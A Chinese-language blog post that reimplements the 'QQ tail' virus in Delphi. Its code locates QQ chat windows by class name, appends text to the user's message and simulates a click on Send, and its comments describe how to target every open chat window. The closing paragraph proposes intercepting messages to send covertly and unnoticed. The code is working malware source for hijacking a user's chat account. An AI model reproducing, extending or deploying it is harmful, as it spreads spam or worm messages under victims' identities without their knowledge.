QQ尾巴病毒的另一种实现

前几天看到 wuqiu 兄 把 QQ尾巴病毒模拟了一遍，

我觉得通过查找窗体标题，不太合常理

回去用SPY++来查看了一下，原来，QQ的框架是这样的

其中，#32770（对话框）就是弹出的QQ聊天界面；内部的控件就如上图显示的那样，有Static(标签)、Button（按钮）、AfxWnd42（这个我猜类似panel的容器）、RICHEDIT（这里面就是显示我们的聊天纪录了）

具体的布局就不一一的细说了，你们可以自己打开SPY++看看，一目了然

其中，我们用到的只是其中两个控件，如下图：

前半部分是句柄，中间是标题，后半部分是类名

如：05240258~发送(&S)~Button

就是发送按钮，句柄是05240258

好了，知道了这些，想做点什么就很简单了

全部代码如下：

PRocedure TForm1.Timer1Timer(Sender: TObject);

Var

hMemo, hRichEdit, HWindow, HButton: THandle; //句柄变量

szText : Array[0..255] Of char; //得到的字符串

MyText : String; //发送的字符串

Begin

HWindow := 0;//从零开始，即从第一个字窗体开始遍历查找

While true Do

Begin

//找是#32770（对话框）的窗体

HWindow := FindWindowEx(0, HWindow, '#32770', Nil);

If HWindow <> 0 Then

Begin

//找是AfxWnd42（这个我猜类似panel的容器）的窗体

hMemo := FindWindowEx(HWindow, 0, 'AfxWnd42', Nil);

If hMemo <> 0 Then

Begin

//找是RICHEDIT的窗体

hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', Nil);

If hRichEdit <> 0 Then

Begin

//想些什么随便啦，嘿嘿

MyText := ' 阿德是个大帅哥，嘿嘿';

//发消息，得到QQ中的文本

SendMessage(hRichEdit, WM_GetTEXT, 256,

integer(@szText[0]));

//加上自己的话

MyText := szText + MyText;

//再发给QQ

SendMessage(hRichEdit, WM_SETTEXT, 256,

integer(MyText));

//找到发送按钮

HButton := FindWindowEx(HWindow, 0, 'Button',

'发送(&S)');

//发点击消息，发送

SendMessage(HButton, BM_CLICK, 0, 0);

//退出，如果去掉这句，就是给所有打开的QQ窗体发

//否则，只发给最前面的QQ窗体

break;

End;

End;

End;

End;

End;

这也只是对QQ尾巴的一种猜测，程序有很多不尽如人意的地方，比如发的文本在QQ中显示一下然后再发送，就如 wuqiu 兄 的文章里说的，只要对消息进行拦截，然后再背地里偷偷的发送，就会神不知鬼不觉了